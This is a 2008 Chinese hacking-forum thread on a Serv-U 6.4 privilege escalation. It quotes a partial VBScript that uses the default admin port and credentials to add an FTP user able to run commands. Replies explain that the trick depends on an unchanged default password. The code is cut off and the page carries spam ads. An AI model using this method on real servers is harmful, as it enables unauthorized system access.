Board logo

标题: [讨论]最近传闻的 SERV-U 6.4提权方法 通杀SERV-U版本 [打印本页]

作者: 冰绿茶    时间: 2008-7-24 17:19     标题: [讨论]最近传闻的 SERV-U 6.4提权方法 通杀SERV-U版本

[讨论]最近传闻的 SERV-U 6.4提权方法 通杀SERV-U版本
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
议题作者:csfs
引用:
SERV-U 6.4提权方法 通杀SERV-U版本
修改ftpport为21

修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|

修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)...OK.....提权...会用FTP增加一个可以


执行命令的用户.....有个这个用户什么不能做哈.....
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
最近网上出了新提权法.
我不怎么明白?有谁成功了,最好做个动画看看!~
帖子1 精华2 积分22 阅读权限40 性别男 在线时间7 小时 注册时间2007-9-14 最后登录2008-3-18 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

hack520
运维管理组

作者: 阿一    时间: 2008-7-24 17:19

密码改了还是没有什么用的,这个方法只能针对密码没有改的6.4版本,当然,以前的版本也可以这样搞.Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料TOP 少女暴富的隐秘(图)

kazhi12
晶莹剔透§烈日灼然
作者: 1600cc    时间: 2008-7-24 17:19

1.serv-u永远是好东西
2.lz代码都有了自己试验下不就行还看什么动画 我讲你来的时候我会让你的鲜血顺着我的刀流下

帖子7 精华0 积分22 阅读权限40 性别男 来自地球 在线时间14 小时 注册时间2006-5-15 最后登录2008-4-18 查看详细资料TOP 爱要怎么说出口

上帝在堕落
晶莹剔透§烈日灼然
作者: 佛硬    时间: 2008-7-24 17:19

这方面的文章太多了 ,你baidu下,serv~u的本地提权都是基于默认密码的,改了密码就不用想了,但在5.0版本有个远程提权,但必须你有个ftp帐户。赠人玫瑰,手留余香。

帖子41 精华0 积分131 阅读权限40 性别男 在线时间65 小时 注册时间2007-5-21 最后登录2008-6-21 查看详细资料TOP

sunue
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2